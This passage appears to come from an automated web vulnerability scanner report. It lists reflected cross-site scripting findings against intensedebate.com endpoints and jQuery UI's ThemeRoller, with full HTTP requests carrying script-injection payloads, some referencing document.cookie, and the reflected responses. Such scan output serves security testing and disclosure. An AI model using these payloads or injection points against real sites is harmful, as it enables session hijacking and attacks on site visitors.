Cookie: anj=Kfw)lmg324*cOV!/@E<Y:@`[idbmI:>w7e%:1E(@lNynpU8#zDeyWpB[QSo:*B_u8(JC>Q@1D2HfGr['`aEUt^DT'q0$S0(<nSEa'Uo/A76wL`s+szES:yl.J.]1eGLl?R9]CHArf1NCsp%=0s3Z_skui(:1Tb-QH!gzLte2*1%!V2#DdJcRwf4=RqtF=@1YS(].jBY%8>TzLXkrbDI0js.mBtkIO!*E@GnXW-wALCL43WoSaR#3xR?9dttLGTclDX`U*C^Q@Zu'+7=eOKD2DpIMJ_bfMqyLb-h44%YJq(_>G@^2^N5ag?dJ=ecL$RU($DV7fC<!T_*Ah4!NTEjqWL)o9vemKzwmb@8otxrpFof[`rt[Ie>I=J>5Oawt(eEg^^W3q_QyseEUQJT.JJqRyB`]dZ#'ii3gT%6Bp3<=@t2f7Q$p@dHe@!Vqq6U0Iu%98]IP<D7.$F:Rx#_SdW.a]RVl?Q2O(1<GGu(lU.Vj7'MO.Ns?z*tz3@.b/'X@.S@u(pc%.JEvl:+*D)9F(fo^>)4(rBmALG+^^no]+Sly^.C-P!+*wPR'hO5k#[sCHO#E%tZv^PeYc0vST.; sess=1; uuid2=4760492999213801733; icu=ChII3pUBEAoYByAHKAcwu77K6gQQu77K6gQYBg..

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 10-Feb-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lmg324*cOV!/@E<Y:@`[idbmI:>w7e%:1E(@lNynpU8#zDeyWpB[QSo:*B_u8(JC>Q@1D2HfGr['`aEUt^DT'q0$S0(<nSEa'Uo/A76wL`s+szES:yl.J.]1eGLl?R9]CHArf1NCsp%=0s3Z_skui(:1Tb-QH!gzLte2*1%!V2#DdJcRwf4=RqtF=@1YS(].jBY%8>TzLXkrbDI0js.mBtkIO!*E@GnXW-wALCL43WoSaR#3xR?9dttLGTclDX`U*C^Q@Zu'+7=eOKD2DpIMJ_bfMqyLb-h44%YJq(_>G@^2^N5ag?dJ=ecL$RU($DV7fC<!T_*Ah4!NTEjqWL)o9vemKzwmb@8otxrpFof[`rt[Ie>I=J>5Oawt(eEg^^W3q_QyseEUQJT.JJqRyB`]dZ#'ii3gT%6Bp3<=@t2f7Q$p@dHe@!Vqq6U0Iu%98]IP<D7.$F:Rx#_SdW.a]RVl?Q2O(1<GGu(lU.Vj7'MO.Ns?z*tz3@.b/'X@.S@u(pc%.JEvl:+*D)9F(fo^>)4(rBmALG+^^no]+Sly^.C-P!+*wPR'hO5k#[sCHO#E%tZv^PeYc0vST.; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 09 Feb 2011 14:09:37 GMT
Content-Length: 1569

<script language="JavaScript" src="http://ad.doubleclick.net/adj/cm.appnexus/nikon_ron_cpm;sz=160x600;app=nikon_ron_cpm;click0=http://ib.adnxs.com/click/AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAA
...[SNIP]...
hnorati.com%2Fcontact-us%2F/clickenc=;ord=1297260347?;btg=app0;btg=an.5;btg=an.51;btg=cm.de16_1;btg=cm.de18_1;btg=cm.ent_h;btg=cm.polit_h;btg=cm.shop_h;btg=cm.sports_h;btg=cm.sportsfan;btg=cm.sportsreg7e23d"><script>alert(1)</script>5ac3272bd5f" type="text/javascript">
...[SNIP]...

1.106. http://intensedebate.com/empty.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88920'><script>alert(1)</script>e89cf172d1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php88920'><script>alert(1)</script>e89cf172d1c HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php88920'><script>alert(1)</script>e89cf172d1c'>
...[SNIP]...

1.107. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c427'><script>alert(1)</script>d010a75075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. As the request below shows, the scanner actually placed the payload in an extra path segment after /empty.php/; the application reflects the whole request URI into the back= parameter of the wordpress.com remote-login.php script URL, so the injection point here is the path rather than a query-string parameter name, the same sink as in 1.106.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php/9c427'><script>alert(1)</script>d010a75075 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/9c427'><script>alert(1)</script>d010a75075'>
...[SNIP]...

1.108. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d4c5'><script>alert(1)</script>765cfe08e1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php5d4c5'><script>alert(1)</script>765cfe08e1b?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315443 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4796

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php5d4c5'><script>alert(1)</script>765cfe08e1b?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315443'>
...[SNIP]...

1.109. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getCommentCounts.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bef9'><script>alert(1)</script>eaabf164f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentCounts.php9bef9'><script>alert(1)</script>eaabf164f70?src=wp-2&acct=bd93835423d7d4b2ee3980d6cba4c893&ids=2456|&guids=http%253A%252F%252Faddyosmani.com%252Fblog%252F%253Fp%253D2456|&links=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F|&titles=Spotlight%2Bon%2BjQuery%2B1.5%253A%2BjQuery.sub%2528%2529%2BExplained%2B%2528Screencast%2529|&authors=Addy|&times=2011-02-02%2B17%253A02%253A02| HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5069

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.php9bef9'><script>alert(1)</script>eaabf164f70?src=wp-2&acct=bd93835423d7d4b2ee3980d6cba4c893&ids=2456|&guids=http%253A%252F%252Faddyosmani.com%252Fblog%252F%253Fp%253D2456|&links=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F|&
...[SNIP]...

1.110. http://intensedebate.com/js/wordpressTemplateCommentWrapper2.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateCommentWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96ded'><script>alert(1)</script>bb633d612d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateCommentWrapper2.php96ded'><script>alert(1)</script>bb633d612d5?acct=bd93835423d7d4b2ee3980d6cba4c893&postid=2456&title=Spotlight+on+jQuery+1.5%3A+jQuery.sub%28%29+Explained+%28Screencast%29&url=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&posttime=2011-02-02+17%3A02%3A02&postauthor=Addy&guid=http%3A%2F%2Faddyosmani.com%2Fblog%2F%3Fp%3D2456 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5033

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateCommentWrapper2.php96ded'><script>alert(1)</script>bb633d612d5?acct=bd93835423d7d4b2ee3980d6cba4c893&postid=2456&title=Spotlight+on+jQuery+1.5%3A+jQuery.sub%28%29+Explained+%28Screencast%29&url=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&pos
...[SNIP]...

1.111. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateLinkWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2ec7c'><script>alert(1)</script>3810834b27b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateLinkWrapper2.php2ec7c'><script>alert(1)</script>3810834b27b?acct=bd93835423d7d4b2ee3980d6cba4c893 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4764

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php2ec7c'><script>alert(1)</script>3810834b27b?acct=bd93835423d7d4b2ee3980d6cba4c893'>
...[SNIP]...

1.112. http://intensedebate.com/remoteCheckin.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteCheckin.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea701'><script>alert(1)</script>8c1d588c7f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteCheckin.phpea701'><script>alert(1)</script>8c1d588c7f7?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315307 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4790

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteCheckin.phpea701'><script>alert(1)</script>8c1d588c7f7?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315307'>
...[SNIP]...

1.113. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteVisit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcc8a'><script>alert(1)</script>dfb1d1116fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteVisit.phpdcc8a'><script>alert(1)</script>dfb1d1116fa?acct=bd93835423d7d4b2ee3980d6cba4c893&time=1297258315030 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4766

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.phpdcc8a'><script>alert(1)</script>dfb1d1116fa?acct=bd93835423d7d4b2ee3980d6cba4c893&time=1297258315030'>
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d819"><script>alert(1)</script>83856e3d441 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff8d819"><script>alert(1)</script>83856e3d441&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff8d819"><script>alert(1)</script>83856e3d441&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e72"><script>alert(1)</script>a9d4d2e762b was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd6e72"><script>alert(1)</script>a9d4d2e762b&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd6e72"><script>alert(1)</script>a9d4d2e762b&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

1.116. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc373"><script>alert(1)</script>3ea55f7fc70 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
